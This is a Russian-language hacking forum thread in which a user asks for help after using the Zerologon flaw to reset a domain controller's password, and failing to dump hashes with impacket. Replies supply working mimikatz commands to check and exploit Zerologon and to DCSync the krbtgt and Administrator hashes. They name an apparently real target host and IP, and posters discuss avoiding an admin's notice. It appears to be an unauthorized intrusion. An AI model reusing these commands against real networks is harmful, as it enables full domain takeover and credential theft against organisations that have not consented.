PrivEsc Zerologon help

[bongiorno]

Сбросил пароли, но дальше не дампятся, пишет (The attempted logon is invalid. This is either due to a bad username or authentication information.), тк нет параметров запуска(домена), думаю из-за этого, через nslookup, ping, пробовал искать нет, нмапом сканил(Те домены, что выдало не подошли)

 

[IIIIXX]

Ты в своем рассказе даже не сформулировал вопрос) чем дампишь? Кого именно ты пробовал искать? Команду и вывод нмапа можно увидеть? Если ты ничего не нашел то как ты сбросил пароль?

 

[wav]

Плохо быть по пояс деревянным )))))))

 

[Dropbear]

чем дампишь?

Дампит тем местом, что у него на аве между ног и думает им=))) Тс, что значит пароли сбросил. Там с DC на тачке хэш сбрасывашь, потом дампишь пароли все. Сбрасывай еще и дампи. Если сбросил пасс с DC, то дапмить должно без проблем хэшы

 

[bongiorno]

Ты в своем рассказе даже не сформулировал вопрос) чем дампишь? Кого именно ты пробовал искать? Команду и вывод нмапа можно увидеть? Если ты ничего не нашел то как ты сбросил пароль?

secretsdump

 

[bongiorno]

Ты в своем рассказе даже не сформулировал вопрос) чем дампишь? Кого именно ты пробовал искать? Команду и вывод нмапа можно увидеть? Если ты ничего не нашел то как ты сбросил пароль?

 

[grupenfurer]

а какая вообще цель то? )

 

[bongiorno]

а какая вообще цель то? )

Чтобы эксп отработал, https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py

 

[grupenfurer]

это не эксп, ты на DC то вообще можешь зайти, если пароль сброшен и сброшен ли?

 

[bongiorno]

инструмент*,

 

[grupenfurer]

инструмент*, Скрытое содержимое

dev-clx это домен контролер? ну и домен проверь

 

[bongiorno]

dev-clx это домен контролер? ну и домен проверь

Контроллер, я проверял

 

[IIIIXX]

Контроллер, я проверял

Ну во первых в твоей команде сикретс дампа у тебя указан фкдн "ad.test.com" хотя я вообще думаю там нужен домен и он в твоем таргете "hidden.com"
Енивей) Попробуй через мимик

# priv
privilege::debug

# Check
lsadump::zerologon /target:DEV-CLX.hidden.com /account:DEV-CLX$

# Exploit
lsadump::zerologon /target:DEV-CLX.hidden.com /account:DEV-CLX$ /exploit

# hash dump for Administrator and krbtgt
lsadump::dcsync /domain:core-lx.com /dc:DEV-CLX.hidden.com /user:krbtgt /authuser:DEV-CLX$ /authdomain:hidden /authpassword:"" /authntlm
lsadump::dcsync /domain:core-lx.com /dc:DEV-CLX.hidden.com /user:Administrator /authuser:DEV-CLX$ /authdomain:hidden /authpassword:"" /authntlm

DEV-CLX.hidden.com
я не знаю ты с внешки или по впну но на всякий я бы внес пару в файл хостс C:\Windows\system32\drivers\etc\hosts

167.114.77.152 DEV-CLX.hidden.com

 

[Periphery]

Интересно конечно просить помощи и отвечать людям в секрете)) о чем речь идет догадайтесь сами

 

[DrSleep]

Делал через MSF, скидывается пасс машины.Что будет если не восстановить потом обратно пасс у компа?

 

[bongiorno]

Делал через MSF, скидывается пасс машины.Что будет если не восстановить потом обратно пасс у компа?

Ну как минимум нашумишь сильно

 

[DrSleep]

Ну как минимум нашумишь сильно

Можно поподробней.

 

[bongiorno]

Можно поподробней

Админ заметит и фиксанет, если адеватный

 

[bongiorno]

Ну во первых в твоей команде сикретс дампа у тебя указан фкдн "ad.test.com" хотя я вообще думаю там нужен домен и он в твоем таргете "core-lx.com"
Енивей) Попробуй через мимик

# priv
privilege::debug

# Check
lsadump::zerologon /target:DEV-CLX.core-lx.com /account:DEV-CLX$

# Exploit
lsadump::zerologon /target:DEV-CLX.core-lx.com /account:DEV-CLX$ /exploit

# hash dump for Administrator and krbtgt
lsadump::dcsync /domain:core-lx.com /dc:DEV-CLX.core-lx.com /user:krbtgt /authuser:DEV-CLX$ /authdomain:core-lx /authpassword:"" /authntlm
lsadump::dcsync /domain:core-lx.com /dc:DEV-CLX.core-lx.com /user:Administrator /authuser:DEV-CLX$ /authdomain:core-lx /authpassword:"" /authntlm

DEV-CLX.core-lx.com
я не знаю ты с внешки или по впну но на всякий я бы внес пару в файл хостс C:\Windows\system32\drivers\etc\hosts

167.114.77.152 DEV-CLX.core-lx.com

Долго не отвечал, там все проще было на самом деле, моя осечка, за импакет не прочитал в нужном обьеме

 

[bongiorno]

Интересно конечно просить помощи и отвечать людям в секрете)) о чем речь идет догадайтесь сами

Таргет в паблик не хотел показывать, люди разные бывают, пойми меня тоже